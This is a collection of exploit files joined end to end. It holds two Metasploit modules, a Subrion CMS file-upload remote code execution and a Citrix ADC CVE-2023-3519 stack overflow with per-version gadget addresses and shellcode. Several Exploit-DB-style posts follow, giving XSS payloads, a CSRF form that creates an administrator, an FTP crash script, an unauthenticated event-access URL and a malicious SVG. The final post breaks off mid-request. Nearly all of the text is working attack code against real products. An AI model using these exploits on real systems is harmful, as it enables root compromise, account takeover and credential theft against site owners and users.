##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Authenticated file-upload to RCE for Subrion CMS <= 4.2.1 (CVE-2018-19422).
#
# Flow (see #exploit): GET /panel/ to read the `__st` CSRF token, POST the
# configured credentials with the same cookie jar, upload a randomly named .phar
# through panel/uploads/read.json, then request it once from /uploads/. The PHP
# payload is built with `unlink_self: true`, so the module expects the file to
# remove itself after that single request.
#
# Detection surface, taken from the requests this module makes: an admin-panel
# login, a multipart POST to panel/uploads/read.json carrying a `.phar` filename,
# and a GET for that filename under /uploads/ (hence ARTIFACTS_ON_DISK and
# IOC_IN_LOGS in 'Notes').
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::PhpEXE
  include Msf::Exploit::Remote::HttpClient

  # Runs #check ahead of #exploit (AutoCheck mixin).
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata plus the four options this module reads: RPORT, TARGETURI,
  # USERNAME and PASSWORD (the latter two default to 'admin'/'admin').
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE',
        'Description' => %q{
          This module exploits an authenticated file upload vulnerability in
          Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by
          the .htaccess file not preventing the execution of .pht, .phar, and
          .xhtml files. Files with these extensions are not included in the
          .htaccess blacklist, hence these files can be uploaded and executed
          to achieve remote code execution. In this module, a .phar file with
          a randomized name is uploaded and executed to receive a Meterpreter
          session on the target, then deletes itself afterwards.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Hexife', # Original discovery, PoC, and CVE submission
          'Fellipe Oliveira', # ExploitDB author
          'Ismail E. Dawoodjee' # Metasploit module author
        ],
        'References' => [
          [ 'EDB', '49876' ],
          [ 'CVE', '2018-19422' ],
          [ 'URL', 'https://github.com/intelliants/subrion/issues/801' ],
          [ 'URL', 'https://github.com/intelliants/subrion/issues/840' ],
          [ 'URL', 'https://github.com/advisories/GHSA-73xj-v6gc-g5p5' ]
        ],
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Targets' => [
          [
            'PHP',
            {
              'Platform' => 'php',
              'Arch' => ARCH_PHP,
              'Type' => :php,
              'DefaultOptions' => {
                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2018-11-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # A .phar is written under /uploads/ and every request goes through the
          # web server's access log.
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(80, true, 'Subrion CMS default port'),
        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
        OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin' ])
      ]
    )
  end

  # Fingerprints the target and compares the advertised version against 4.2.1.
  #
  # @return [CheckCode] Unknown when there is no response or the /panel/ body does
  #   not contain 'subrion'; Detected when a version string cannot be scraped from
  #   the footer; Appears when the scraped version is <= 4.2.1; Safe otherwise.
  def check
    uri = normalize_uri(target_uri.path, 'panel/') # requires a trailing forward slash
    print_status("Checking target web server for a response at: #{full_uri(uri)}")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri
    })

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.code == 200 && res.body.downcase.include?('subrion')
      return CheckCode::Unknown('Target is not running Subrion CMS.')
    end

    print_good('Target is running Subrion CMS.')

    # Powered by <a href="https://subrion.org/" title="Subrion CMS">Subrion CMS v4.2.1</a><br>
    print_status('Checking Subrion CMS version...')
    # NOTE(review): `[\d.]+` also accepts a trailing '.', so a footer such as
    # 'v4.2.1.' would reach Rex::Version unchanged -- confirm against real footers.
    version_number = res.body.to_s.scan(/Subrion\sCMS\sv([\d.]+)/).flatten.first

    unless version_number
      return CheckCode::Detected('Subrion CMS version cannot be determined.')
    end

    print_good("Target is running Subrion CMS Version #{version_number}.")

    if Rex::Version.new(version_number) <= Rex::Version.new('4.2.1')
      # Version alone is not proof: the fix is an .htaccess change an admin can apply.
      return CheckCode::Appears(
        'However, this version check does not guarantee that the target is vulnerable, ' \
        'since a fix for the vulnerability can easily be applied by a web admin.'
      )
    end

    return CheckCode::Safe
  end

  # Fetches the admin login page to obtain the per-session `__st` CSRF token, then
  # posts the credentials with the same cookie jar.
  #
  # @param username [String] value sent in the `username` form field
  # @param password [String] value sent in the `password` form field
  # @return [String] the `__st` token, reused by #upload_and_execute_payload
  # @raise via fail_with on: no/non-200 response to the GET (Failure::Unknown), no
  #   `__st` field in the page (Failure::NotFound), no/non-200 response to the POST,
  #   or a POST response whose `__st` differs from the one sent or that does not
  #   contain 'administrator' -- both treated as a failed login (Failure::NoAccess).
  def login_and_get_csrf_token(username, password)
    print_status('Connecting to Subrion Admin Panel login page to obtain CSRF token...')

    # Session cookies need to be kept to preserve the CSRF token across multiple requests
    uri = normalize_uri(target_uri.path, 'panel/')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri,
      'keep_cookies' => true
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Could not access the Subrion Admin Panel page.")
    end

    # <input type="hidden" name="__st" value="CA0S3w50vz1zRpdgZl98JAMVrimiXI63lKtxAwyi">
    # The named capture is assigned to the local `csrf_token` by the `=~` on a literal.
    %r{name="__st" value="(?<csrf_token>[\w+=/]+)">} =~ res.body
    fail_with(Failure::NotFound, "#{peer} - Failed to get CSRF token.") if csrf_token.nil?

    print_good("Successfully obtained CSRF token: #{csrf_token}")

    # The cleartext PASSWORD option is echoed to the console/log by this status line.
    print_status(
      "Logging in to Subrion Admin Panel at: #{full_uri(uri)} " \
      "using credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}"
    )
    auth = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'keep_cookies' => true,
      'vars_post' => {
        '__st' => csrf_token,
        'username' => username,
        'password' => password
      }
    })

    unless auth && auth.code == 200
      fail_with(Failure::NoAccess, "#{peer} - Failed to log in, cannot access the Admin Panel page.")
    end

    # Login heuristic: the post-login page must carry the same `__st` token and the
    # word 'administrator' somewhere in its body.
    %r{name="__st" value="(?<csrf_token_auth>[\w+=/]+)">} =~ auth.body
    unless csrf_token == csrf_token_auth && auth.body.downcase.include?('administrator')
      fail_with(Failure::NoAccess, "#{peer} - Failed to log in, invalid credentials.")
    end

    print_good('Successfully logged in as Administrator.')
    return csrf_token
  end

  # Uploads the PHP payload as a .phar through the admin file-manager endpoint and
  # requests it once.
  #
  # @param csrf_token [String] the `__st` value returned by #login_and_get_csrf_token
  # @return [void]
  # @raise via fail_with(Failure::UnexpectedReply) when the upload POST does not
  #   return 200
  def upload_and_execute_payload(csrf_token)
    print_status('Preparing payload...')

    # set `unlink_self: true` to delete the file after execution
    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.phar"
    php_payload = get_write_exec_payload(unlink_self: true)

    # Multipart body mirroring the file manager's own upload form fields.
    data = Rex::MIME::Message.new
    data.add_part(Rex::Text.rand_text_alphanumeric(14), nil, nil, 'form-data; name="reqid"')
    data.add_part('upload', nil, nil, 'form-data; name="cmd"')
    # NOTE(review): 'l1_Lw' is the value the original module sends for the file
    # manager's `target` field; its encoding is not derived here -- confirm before changing.
    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
    data.add_part(csrf_token, nil, nil, 'form-data; name="__st"')
    data.add_part(
      "#{php_payload}\n",
      'application/octet-stream',
      nil,
      "form-data; name=\"upload[]\"; filename=\"#{payload_name}\""
    )
    # Current time as UTC epoch seconds, as the form would send for the file's mtime.
    data.add_part(Time.now.getutc.to_i.to_s, nil, nil, 'form-data; name="mtime[]"')

    print_status('Sending POST data...')

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'panel', 'uploads', 'read.json'),
      'keep_cookies' => true,
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => data.to_s
    })

    # Only the HTTP status is checked; the JSON body is not parsed for an error field.
    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload PHP payload.")
    end
    payload_uri = normalize_uri(target_uri.path, 'uploads', payload_name)

    print_good("Successfully uploaded payload at: #{full_uri(payload_uri)}")

    # This execution request returns nil
    # The response is intentionally not inspected, so the 'Successfully executed'
    # line below is printed whether or not the payload actually ran.
    print_status("Executing '#{payload_name}'... This file will be deleted after execution.")
    send_request_cgi({
      'method' => 'GET',
      'uri' => payload_uri,
      'keep_cookies' => true
    })

    print_good("Successfully executed payload: #{full_uri(payload_uri)}")
  end

  # Entry point: authenticate with the configured credentials, then upload and
  # trigger the payload with the token obtained from the login.
  def exploit
    csrf_token = login_and_get_csrf_token(datastore['USERNAME'], datastore['PASSWORD'])
    upload_and_execute_payload(csrf_token)
  end

end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated stack buffer overflow in the Citrix ADC / NetScaler nsppe process
# (CVE-2023-3519), reached with a single GET to /gwtest/formssso.
#
# The `target` query parameter is built from `return_offset` filler bytes, the
# per-version `return` gadget address, and a small x64 stub assembled at run time
# (see #exploit). Every constant the stub needs lives in the selected target hash.
#
# Detection surface, from the request this module sends: a GET to
# /gwtest/formssso?event=start with an unusually long, partly percent-encoded
# `target` value (hence IOC_IN_LOGS). 'Stability' is left empty by the authors.
class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  # Runs #check ahead of #exploit (AutoCheck mixin).
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  # Module metadata, per-version target constants and the single TARGETURI option.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Citrix ADC (NetScaler) Forms SSO Target RCE',
        'Description' => %q{
          A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer
          overflow of the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in
          remote code execution as root.
        },
        'Author' => [
          'Ron Bowes', # Analysis and module
          'Douglass McKee', # Analysis and module
          'Spencer McIntyre', # Just the module
        ],
        'References' => [
          ['CVE', '2023-3519'],
          ['URL', 'https://attackerkb.com/topics/si09VNJhHh/cve-2023-3519'],
          ['URL', 'https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467']
        ],
        'DisclosureDate' => '2023-07-18',
        'License' => MSF_LICENSE,
        'Platform' => ['unix'],
        # The payload is a shell command string handed to popen(), not machine code.
        'Arch' => [ARCH_CMD],
        'Payload' => {
          # at a certain point too much of the stack will get corrupted, should be less than target['fixup_rsp_adjustment']
          'Space' => 2048,
          'DisableNops' => true
        },
        # Keys consumed by #exploit:
        #   return                - value written over the saved return pointer (a `jmp rsp`)
        #   return_offset         - bytes of random filler placed before it
        #   popen                 - address loaded into rax and called as popen(cmd, "r")
        #   fixup_rsp_adjustment  - added to rsp after the call (plus the 0x200 scratch gap)
        #   fixup_rbp_adjustment  - optional; rbp is rebuilt from rsp when present
        #   fixup_return          - pushed and returned into so the clobbered
        #                           ns_aaa_cookie_valid frame can finish normally
        'Targets' => [
          [
            'Citrix ADC 13.1-48.47',
            {
              'fixup_return' => 0x00782403, # pop rbx; ns_aaa_cookie_valid
              'fixup_rsp_adjustment' => 0x13a8,
              'popen' => 0x01da6340,
              'return' => 0x00611ae9, # jmp rsp; ns_create_cfg_nsp
              'return_offset' => 168
            },
          ],
          [
            'Citrix ADC 13.1-37.38',
            {
              'fixup_return' => 0x0077c324, # pop rbx; ns_aaa_cookie_valid
              'fixup_rsp_adjustment' => 0x13a8,
              'popen' => 0x01d7e320,
              'return' => 0x015d131d, # jmp rsp; tfocookie_send_callback
              'return_offset' => 168
            },
          ],
          [
            'Citrix ADC 13.0-91.12',
            {
              'fixup_return' => 0x008530a2, # mov rbx, qword [rbp-0x28]; ns_aaa_cookie_valid
              'fixup_rsp_adjustment' => 0x12e0,
              # in this version the epilogue of ns_aaa_cookie_valid reads directly from rbp and since the exploit
              # clobbers it, the value needs to be restored
              'fixup_rbp_adjustment' => 0x190,
              'popen' => 0x01f42ec0,
              'return' => 0x024883bf, # jmp rsp; ns_pixl_eval_nvlist_t_typecast_list_t_dynamic
              'return_offset' => 168
            }
          ]
        ],
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          # No response is inspected in #exploit; the session is simply waited for.
          'WfsDelay' => 10
        },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  # Fingerprints a NetScaler Gateway logon page. No version is extracted, so the
  # strongest result is Detected.
  #
  # @return [CheckCode] Unknown without a response; Safe unless the logon page
  #   answers 200 with the `_ctxstxt_NetscalerGateway` title class; Detected otherwise.
  def check
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], 'logon', 'LogonPoint', 'index.html')
    })

    return CheckCode::Unknown if res.nil?

    return CheckCode::Safe unless res.code == 200 && res.body =~ /<title class="_ctxstxt_NetscalerGateway">/

    CheckCode::Detected
  end

  # Sends the single overflowing GET.
  #
  # Stub layout (assembled with Metasm after ERB expansion by Template.render):
  #   call/pop loads rdi with the address of the command string (a PATH export
  #   followed by payload.encoded run through Rex::Text.to_hex) and rsi with "r",
  #   rax is set to target['popen'] and called below a 0x200-byte scratch gap, then
  #   rsp (and rbp when the target defines fixup_rbp_adjustment) is repaired and the
  #   stub returns into target['fixup_return'].
  # Encoding: bytes below 0xa0 are percent-encoded by hand, the rest are sent raw,
  # which is why `encode_params` is turned off for this request.
  # @return [void] the response is not inspected
  def exploit
    shellcode = Metasm::Shellcode.assemble(Metasm::X64.new, Template.render(<<-SHELLCODE, target: target)).encode_string
      call loc_popen_arg1
      ; add this to the path for python payloads
      db "export PATH=/var/python/bin:$PATH;"
      db "#{Rex::Text.to_hex(payload.encoded)}", 0
    loc_popen_arg1:
      pop rdi

      call loc_popen_arg2
      db "r", 0
    loc_popen_arg2:
      pop rsi

      mov rax, <%= target['popen'] %>
      sub rsp, 0x200
      call rax

    loc_return:
      xor rax, rax
      add rsp, <%= target['fixup_rsp_adjustment'] + 0x200 %>
      <% if target['fixup_rbp_adjustment'] %>
      mov rbp, rsp
      add rbp, <%= target['fixup_rbp_adjustment'] %>
      <% end %>
      push <%= target['fixup_return'] %>
      ret
    SHELLCODE

    # filler | return address (8 bytes, native byte order via pack('Q')) | stub
    buffer = rand_text_alphanumeric(target['return_offset'])
    buffer << [target['return']].pack('Q')
    buffer << shellcode.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join

    send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], 'gwtest', 'formssso'),
      'encode_params' => false, # we'll encode them ourselves
      'vars_get' => {
        'event' => 'start',
        'target' => buffer
      }
    })
  end

  # Minimal ERB renderer for the shellcode template above.
  class Template
    # Evaluates an Erubi-compiled template in a binding where each `context` key is
    # defined as a local variable. The only caller in this file passes the module's
    # own `target` hash, so the eval never sees untrusted input.
    #
    # @param template [String] ERB source
    # @param context [Hash, nil] locals to expose to the template
    # @return [String] rendered text
    # @raise [ArgumentError] when context is neither a Hash nor nil
    def self.render(template, context = nil)
      case context
      when Hash
        b = binding
        # e.g. "target = context[:target]; " -- `context` is reachable from `b`.
        locals = context.collect { |k, _| "#{k} = context[#{k.inspect}]; " }
        b.eval(locals.join)
      when NilClass
        b = binding
      else
        raise ArgumentError
      end

      b.eval(Erubi::Engine.new(template).src)
    end
  end
end
<pre><code># Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 29/07/2023<br /># Vendor: adivaha - Travel Tech Company<br /># Vendor Homepage: https://www.adivaha.com/<br /># Software Link: https://wordpress.org/plugins/adiaha-hotel/<br /># Demo: https://www.adivaha.com/demo/adivaha-online/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL in an email or instant message and<br />can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br />Path: /mobile-app/v3/<br /><br />The GET parameter 'isMobile' is vulnerable to reflected XSS.<br /><br />https://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS]<br /><br /><br />XSS Payload: clq95"><script>alert(1)</script>lb1ra<br /><br /><br />[-] Done<br /></code></pre>
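#!/usr/bin/env python3
# Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
# Discovered by: Yehia Elghaly
# Discovered Date: 2023-08-04
# Vendor Homepage: https://www.xlightftpd.com/
# Software Link : https://www.xlightftpd.com/download/setup.exe
# Tested Version: 3.9.3.6
# Vulnerability Type: Buffer Overflow Local
# Tested on OS: Windows XP Professional SP3 - Windows 11 x64

# Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)
#
# This script only writes a text file of repeated 'A' characters; the crash is
# reproduced by pasting that content into the server's configuration dialog
# (steps below). Nothing is sent over the network.

# Steps to reproduce:
# 1. - Download and install Xlight FTP Server
# 2. - Run the python script and it will create exploit.txt file.
# 3. - Open Xlight FTP Server 3.9.3.6
# 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc - Setup
# 5. - Execute a Program after user logged in - Paste the characters
# 6. - Crashed

# Length of the pattern used by the original PoC; kept as a named constant so the
# value is documented rather than a magic number.
PATTERN_LENGTH = 294
exploit = 'A' * PATTERN_LENGTH

try:
    with open("exploit.txt", "w") as file:
        file.write(exploit)
    print("POC is created")
except OSError as error:
    # Only file-system failures are expected here. The original bare `except:`
    # also swallowed KeyboardInterrupt and programming errors, hiding the cause.
    print(f"POC not created: {error}")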
<pre><code># Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access<br /># Date: 03.08.2023<br /># Exploit Author: Miguel Santareno<br /># Vendor Homepage: https://www.myeventon.com/<br /># Version: 4.4<br /># Tested on: Google and Firefox latest version<br /># CVE : CVE-2023-2796<br /><br /># 1. Description<br />The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.<br /><br /><br /># 2. Proof of Concept (PoC)<br />Proof of Concept:<br />https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value<br /><br /></code></pre>
# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)
# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt
# Date: 2023-07-27
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://ninjaforms.com/
# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip
# Version: 3.6.25
# Tested on: Windows 10
# CVE: CVE-2023-37979
#
# Script layout: the target URL is taken from the LAST argv entry at import time,
# a self-contained HTML page holding a form the user submits by clicking is
# rendered into HTML_TEMPLATE, and check_script() drives the flow (readme.txt
# version probe, then optional --exploit which writes and opens that page).

from requests import get
from sys import argv
from os import getcwd
import webbrowser
from time import sleep


# Values:
# NOTE(review): argv[-1] is used unconditionally, so with no arguments `url` is the
# script's own path; check_script() only rejects that later by argv length.
url = argv[-1]
if url[-1] == "/":
    url = url.rstrip("/")

# Constants
CVE_NAME = "CVE-2023-37979"
VULNERABLE_VERSION = "3.6.25"  # informational only; check_CVE() hard-codes 3 / 6 / 25

# HTML template
# The form POSTs to {url}/wp-admin/admin-ajax.php; the `data` field carries the
# reflected payload. CSS braces are doubled because this is an f-string.
# NOTE(review): the footer's LinkedIn anchor ends with `</a` (missing '>'); it is
# kept verbatim here because the template is runtime data, not a comment.
HTML_TEMPLATE = f"""<!DOCTYPE html>
<!-- Created By Mehran Seifalinia -->
<html>
<head>
    <title>{CVE_NAME}</title>
    <style>
        body {{
            font-family: Arial, sans-serif;
            background-color: #f7f7f7;
            color: #333;
            margin: 0;
            padding: 0;
        }}
        header {{
            background-color: #4CAF50;
            padding: 10px;
            text-align: center;
            color: white;
            font-size: 24px;
        }}
        .cool-button {{
            background-color: #007bff;
            color: white;
            padding: 10px 20px;
            border: none;
            cursor: pointer;
            font-size: 16px;
            border-radius: 4px;
        }}
        .cool-button:hover {{
            background-color: #0056b3;
        }}
    </style>
</head>
<body>
    <header>
        Ninja-forms reflected XSS ({CVE_NAME})</br>
        Created by Mehran Seifalinia
    </header>
    <div style="padding: 20px;">
        <form action="{url}/wp-admin/admin-ajax.php" method="POST">
            <input type="hidden" name="action" value="nf_batch_process" />
            <input type="hidden" name="batch_type" value="import_form_template" />
            <input type="hidden" name="security" value="e29f2d8dca" />
            <input type="hidden" name="extraData[template]" value="formtemplate-contactformd" />
            <input type="hidden" name="method_override" value="_respond" />
            <input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" />
            <input type="submit" class="cool-button" value="Click here to Execute XSS" />
        </form>
    </div>
    <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>
    <footer>
        <a href="https://github.com/Mehran-Seifalinia">Github</a>
        </br>
        <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a
    </footer>
</body>
</html>
"""

def exploit() -> None:
    """Write HTML_TEMPLATE to ./<CVE_NAME>.html and open it in the default browser.

    The printed and opened path is joined with a literal backslash (Windows
    style, matching the 'Tested on: Windows 10' header); the file itself is
    written relative to the current directory, so on other platforms the file
    exists but the path handed to webbrowser.open() will not match it.
    """
    with open(f"{CVE_NAME}.html", "w") as poc:
        poc.write(HTML_TEMPLATE)
    print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")
    print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
    sleep(2)
    webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")

# Check if the vulnerable version is installed
def check_CVE() -> bool:
    """Fetch the plugin's public readme.txt and decide from its 'Stable tag' line.

    Returns True when the parsed version is <= 3.6.25, False when the plugin is
    not found (non-200 or no 'Ninja Forms' text) or the version is newer. Any
    exception -- network errors, or an unexpected readme layout surfacing as
    IndexError/ValueError from the split()/int() chain -- is printed and the
    process exits.
    """
    try:
        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")
        if response.status_code != 200 or not("Ninja Forms" in response.text):
            print("[!] Ninja-forms plugin has not installed on this site.")
            return False
        else:
            # Text between "Stable tag:" and "License", first whitespace token, e.g. "3.6.25".
            version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]
            main_version = int(version.split(".")[0])
            partial_version = int(version.split(".")[1])
            final_version = int(version.split(".")[2])
            # Lexicographic compare on (major, minor, patch) against 3.6.25, inclusive.
            if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):
                # 'Nonja' is a typo in the original; kept because it is runtime output.
                print(f"[*] Vulnerable Nonja-forms version {version} detected!")
                return True
            else:
                print(f"[!] Nonja-forms version {version} is not vulnerable!")
                return False
    except Exception as error:
        print(f"[!] Error: {error}")
        exit()

# Check syntax of the script
def check_script() -> None:
    """Validate argv, run the version probe, and optionally run exploit().

    Accepts one or two arguments: [--exploit] TARGET. Exits on bad arity or a
    target that does not start with http:// or https://. exit() raises
    SystemExit, a BaseException, so the `except Exception` below does not
    intercept those exits.
    """
    usage = f"""
Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]

    OPTIONS:
        --exploit: Open a browser and execute the vulnerability.
    TARGET:
        An URL starts with 'http://' or 'https://'

Examples:
    > {argv[0].split("/")[-1]} https://vulnsite.com
    > {argv[0].split("/")[-1]} --exploit https://vulnsite.com
"""
    try:
        if len(argv) < 2 or len(argv) > 3:
            print("[!] Syntax error...")
            print(usage)
            exit()
        elif not url.startswith(tuple(["http://", "https://"])):
            print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")
            exit()
        else:
            # argv is walked in order: argv[0] (the script itself) triggers the
            # probe, the URL is skipped, --exploit runs exploit(), anything else
            # is reported but does not abort.
            for arg in argv:
                if arg == argv[0]:
                    print("[*]Starting the script >>>")
                    state = check_CVE()
                    if state == False:
                        exit()
                elif arg.lower() == "--exploit":
                    exploit()
                elif arg == url:
                    continue
                else:
                    print(f"[!] What the heck is '{arg}' in the command?")
    except Exception as error:
        print(f"[!] Error: {error}")
        exit()

if __name__ == "__main__":
    check_script()
<pre><code>====================================================================================================================================<br />| # Title : COURIER DEPRIXA V2.5 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin .<br /><br />[+] Go to the line 5.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /deprixa/settings/addusersadmin/agregar.php<br /><br />[+] save code as poc.html <br /><br />[+] <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i> New Administrator</h4><br /> </div><br /> <div class="modal-body"><br /> <!--Cuerpo del modal aquí el formulario--><br /> <form action="https://127.0.0.1/galaxyexpressuaecom/deprixa/settings/addusersadmin/agregar.php" class="form-horizontal" method="post"><br /> <div class="form-group " id="gnombrepa"><br /> <label for="off_name" class="col-sm-2 control-label">Name</label><br /> <div class="col-sm-10"><br /> <input type="text" class="form-control off_name" name="name_parson" placeholder="Name Administrator "><br /> </div><br /> </div><br /> <div class="form-group" id="gapellido"><br /> <label for="email" class="col-sm-2 control-label">Email </label><br /> <div class="col-sm-5"><br /> <input type="text" class="form-control email" name="email" placeholder="Email "><br /> </div><br /> <div class="col-sm-5"><br /> <input class="form-control phone" name="phone" placeholder="Phone"> <br /> </div><br /> </div><br /> <div class="form-group" id="gemail"><br /> <label for="office" 
class="col-sm-2 control-label">Office</label><br /> <div class="col-sm-5"><br /> <input type="text" class="form-control office" name="office" placeholder="Office "><br /> </div><br /> <div class="col-sm-5"><br /> <select type="text" class="form-control role" name="role" ><br /> <option value="Administrator">Administrator</option> <br /> </select><br /> </div><br /> </div><br /> <div class="form-group " id="gnombre"><br /> <label for="off_name" class="col-sm-2 control-label">User</label><br /> <div class="col-sm-10"><br /> <input type="text" class="form-control off_name" name="name" placeholder="User"><br /> </div><br /> </div><br /> <div class="form-group" id="gpassword"><br /> <label for="pwd" class="col-sm-2 control-label">Password</label><br /> <div class="col-sm-10"><br /> <input type="text" class="form-control pwd" name="pwd" placeholder="Password"><br /> </div><br /> </div><br /> <div class="form-group"><br /> <div class="col-sm-offset-2 col-sm-10"><br /> <div class="checkbox checkbox-success"><br /> <input id="checkbox3" type="checkbox" name="estado" value="1" checked><br /> <label for="checkbox3"><br /> Status<br /> </label><br /> </div><br /> <div class="checkbox checkbox-inline" ><br /> <input type="checkbox" name="type" value="a" onclick="return false" checked><br /> <label for="inlineCheckbox3"> Type of user </label><br /> </div><br /> </div><br /> </div><br /> <!--Fin del cuerpo del modal--><br /> </div><br /> <div class="modal-footer"><br /> <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i><br /> Close</button><br /> <input class="btn btn-success" name="Submit" type="submit" id="submit" value="Save"><br /> </div><br /> </form> <br /> </div><br /> </div><br /> </div><br /> <!--fin de mo<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. 
Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS<br />Application: Webedition CMS<br />Version: v2.9.8.8 <br />Bugs: Stored Xss<br />Technology: PHP<br />Vendor URL: https://www.webedition.org/<br />Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1<br />Date of found: 03.08.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps<br />1. Login to account<br />2. Go to New -> Media -> Image<br />3. Upload malicious svg file <br />svg file content:<br /><br />"""<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />"""<br /><br /><br />Poc request:<br /><br />POST 